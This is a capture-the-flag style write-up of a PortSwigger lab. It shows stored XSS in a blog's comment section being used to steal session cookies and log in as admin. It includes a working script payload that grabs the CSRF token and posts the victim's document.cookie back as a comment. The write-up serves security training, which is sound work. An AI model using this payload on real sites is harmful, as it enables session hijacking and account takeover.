Skip to content

Files

Latest commit

 

History

History

Exploiting cross-site scripting to steal cookies

Exploiting cross-site scripting to steal cookies

So in this challenge, we are going to implement exploitation on user cookies using XSS Attack. We got another example of Blog Site where they allow user to give comment on posts: comment-section

If we try to attempt XSS using <script> tag, then we able to perform XSS, it means that we can just insert our payload normally inside the <script> tag.

script-tag-attempt

script-tag-attempt-success

Now let's create a payload where we able to get user cookies, What we able to do is:

  1. Send the user cookies to a webhook or our site that collects user cookies
  2. Show the cookies in the comment box

I tried the first solution but the result was not as what i expected, i only got a session but not the cookies we need to gain access since it was a third party and Portwigger didn't allow us to use third party app, so i tried the second solution, I create a payload that force user to request post a comment to a blog, you can find the right endpoint and needed data using intercept in BurpSuite. To post a comment, we need to get their CSRF Token, we can find it in the <input> tag attribute.

CSRF-value

This is my final payload:

<script>
    window.onload = function(){
        const Token = document.getElementsByTagName('input')[0].value
        var data = 'csrf='+Token +'&'
        data += 'postId=10&'
        data += 'comment='+document.cookie+'&'
        data += 'name=DjumantotheAdmin&'
        data += 'email=roc@chic.com&'
        data += 'website=https://google.com'
        fetch('https://0a4500e6034e583480d12b22009f0070.web-security-academy.net/post/comment', 
                {
                    method: 'POST',
                    mode: 'no-cors',
                    body: data
                }
            )
    };
</script>

So here's how the code works:

  • We want to run it right where the content is loaded using window.onload() function
  • We take their CSRF Token from the input tag
  • We set the comment using their cookies
  • We set the postId value using current blog value which is 10

And this is the result:

attempt-using-payload

Result

Success

login-as-admin